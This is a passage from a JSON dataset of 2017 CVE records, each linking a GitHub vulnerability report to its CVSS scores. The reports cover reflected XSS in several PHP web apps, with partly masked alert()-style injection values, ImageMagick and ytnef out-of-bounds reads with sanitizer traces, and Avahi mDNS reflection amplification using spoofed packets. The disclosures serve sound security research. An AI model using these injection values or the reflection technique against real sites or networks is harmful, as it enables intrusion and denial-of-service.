        "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : element, state, cat, id, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6491",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/168",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/168",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-03-02T18:20:04Z",
        "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : tooltip_id,callback,args, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6500",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/376",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/376",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-02-08T15:32:18Z",
        "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug2 /dev/null FILETAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG eb2 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG bfe4d NUMBERTAG sp NUMBERTAG bfe4d NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG eb2 thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG eb2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG ea NUMBERTAG b NUMBERTAG eb1) allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG c0: fa fa fa fa fa fa fa fa fd fd fd fd fa fa fd fd NUMBERTAG aa NUMBERTAG d0: fd fd fa fa NUMBERTAG fa fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG aa NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6500",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/375",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/375",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-02-08T15:29:18Z",
        "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug1 /dev/null FILETAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fd fd fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ea0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG eb0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ec0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ed0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6509",
        "Issue_Url_old": "https://github.com/Smith0r/burgundy-cms/issues/36",
        "Issue_Url_new": "https://github.com/smith0r/burgundy-cms/issues/36",
        "Repo_new": "Smith0r/burgundy-cms",
        "Issue_Created_At": "2017-03-05T15:05:17Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6511",
        "Issue_Url_old": "https://github.com/andrzuk/FineCMS/issues/2",
        "Issue_Url_new": "https://github.com/andrzuk/finecms/issues/2",
        "Repo_new": "andrzuk/finecms",
        "Issue_Created_At": "2017-03-04T15:28:47Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6519",
        "Issue_Url_old": "https://github.com/lathiat/avahi/issues/203",
        "Issue_Url_new": "https://github.com/lathiat/avahi/issues/203",
        "Repo_new": "lathiat/avahi",
        "Issue_Created_At": "2018-11-08T16:06:58Z",
        "description": "Missing link local checks in Avahi makes APITAG with mDNS traffic reflection possible. I tried with Scapy to do a reflection with amplification on mDNS service running Avahi (git master branch and version NUMBERTAG with a good result. This is very similar to issue APITAG observed with SSDP URLTAG : lack of link local checks when processing queries. I sent spoofed datagram to mDNS with: APITAG This was responded by Avahi with amplification from NUMBERTAG to NUMBERTAG bytes and sent to spoofed IP. CODETAG Attaching PCAP file with query and response. Query was sent from same subnet. FILETAG As you see Avahi replied to multicast query and sent reply to Cloudflare's DNS server on NUMBERTAG port. TTL was NUMBERTAG My router decremented that to NUMBERTAG and forwarded packet to WAN, Unicast queries seems to be handled in a similar way. I tested some more devices not running Avahi to have better understanding of the issue. My very old AVR (vulnerable to mDNS reflection on various ports, seems to have no link local checks). Avahi daemon NUMBERTAG also vulnerable, didn't fallback to multicast, nor ignore non link local queries, moreover it responds with unicast to src/dst port NUMBERTAG which seems to violate RFS and cause even more reflections possible). On the other hand Google Chromecast seems to do very strict link local checks and answers mostly with multicast replies. What is very interesting, as it ignores any non link local queries. I was unable to do any reflection with Chromecast. I played also a bit with APITAG mDNS implementation and it seems to ignore all my attempts just as Chromecast do. In my opinion section NUMBERTAG of mDNS RFC NUMBERTAG still applies to Legacy Unicast Responses. Link local checks should be done, and non link local queries discarded. Google Chromecast seems to ignore requirements of s ection NUMBERTAG APITAG Unicast Responses) and sends response to NUMBERTAG port with multicast reply. Could this be fixed just by a strict verification of source address belongs to link local network to make sure remote, rouge queries are ignored? The second part of improvement would be removal of legacy support and force of fallback to multicast to ensure answers are link local too. This however might break backward compatibility as I understand.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6533",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/833",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/833",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:52:39Z",
        "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbenchmark\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6534",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/835",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/835",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:53:23Z",
        "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpssid\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6535",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/832",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/832",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:52:20Z",
        "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6536",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/838",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/838",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:54:40Z",
        "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6537",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/837",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/837",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:54:05Z",
        "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbgcolor\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG PATHTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6538",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/836",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/836",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:53:43Z",
        "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cvideo\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6539",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/831",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/831",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:51:58Z",
        "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6540",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/830",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/830",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:51:28Z",
        "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cconfigs\u201d HTTP GET/POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG POST: configs= \";} APITAG APITAG alert NUMBERTAG APITAG APITAG function APITAG TO FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6541",
        "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/834",
        "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/834",
        "Repo_new": "wpo-foundation/webpagetest",
        "Issue_Created_At": "2017-03-04T07:53:04Z",
        "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6544",
        "Issue_Url_old": "https://github.com/Gargaj/wuhu/issues/20",
        "Issue_Url_new": "https://github.com/gargaj/wuhu/issues/20",
        "Repo_new": "gargaj/wuhu",
        "Issue_Created_At": "2017-03-04T05:32:09Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cid\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6800",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/28",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/28",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-02-15T15:24:13Z",
        "description": "out of bounds read with test data in APITAG When compiling ytnef with address sanitizer enabled (a compiler feature to detect invalid memory access), it shows an out of bounds read in the function APITAG This doesn't require any malformed input, it happens with many of the test files shipped in the dir test data. To reproduce: Compile ytnef NUMBERTAG with address sanitizer: ./autogen.sh; ./configure; make CFLAGS=\" fsanitize=address g\" Run ytnefprint/ytnefprint test APITAG or ytnefprint/ytnefprint test data/winmail.dat Here's the error message from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eeb0 at pc NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG a bp NUMBERTAG ffd NUMBERTAG a NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG a NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG eeb0 thread T NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d9bbc in APITAG PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG NUMBERTAG d8d NUMBERTAG in _start ( PATHTAG NUMBERTAG eeb4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG eb3a NUMBERTAG in calloc ( PATHTAG NUMBERTAG f NUMBERTAG eb0c3f2a in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0cac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c9ac6 in APITAG PATHTAG NUMBERTAG d NUMBERTAG dc in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6802",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/34",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/34",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-02-24T22:46:57Z",
